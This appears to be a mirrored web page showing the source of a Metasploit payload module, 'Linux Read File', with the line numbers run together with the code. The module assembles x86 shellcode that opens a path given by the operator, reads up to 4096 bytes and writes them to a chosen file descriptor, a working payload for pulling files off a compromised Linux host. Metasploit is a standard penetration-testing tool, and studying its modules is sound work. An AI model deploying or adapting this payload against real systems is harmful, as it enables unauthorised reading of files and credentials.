Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/x86/read_file.rb
Views: 11781
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule67CachedSize = 6389include Msf::Payload::Single10include Msf::Payload::Linux1112def initialize(info = {})13super(merge_info(info,14'Name' => 'Linux Read File',15'Version' => '',16'Description' => 'Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor',17'Author' => 'hal',18'License' => MSF_LICENSE,19'Platform' => 'linux',20'Arch' => ARCH_X86))2122# Register exec options23register_options(24[25OptString.new('PATH', [ true, "The file path to read" ]),26OptString.new('FD', [ true, "The file descriptor to write output to", 1 ]),27])28end2930def generate(opts={})31fd = datastore['FD']3233payload_data =<<-EOS34jmp file3536open:37mov eax,0x5 ; open() syscall38pop ebx ; Holds the filename39xor ecx,ecx ; Open for reading (0)40int 0x804142read:43mov ebx,eax ; Store the open fd44mov eax,0x3 ; read() syscall45mov edi,esp ; We're just going to save on the stack46mov ecx,edi ; Save at edi47mov edx,0x1000 ; Read as much as we can48int 0x804950write:51mov edx,eax ; Number of bytes to write52mov eax,0x4 ; write() system call53mov ebx,#{fd} ; fd to write to54int 0x805556exit:57mov eax,0x1 ; exit() system call58mov ebx,0x0 ; return 059int 0x806061file:62call open63db "#{datastore['PATH']}", 0x0064EOS6566Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string67end68end697071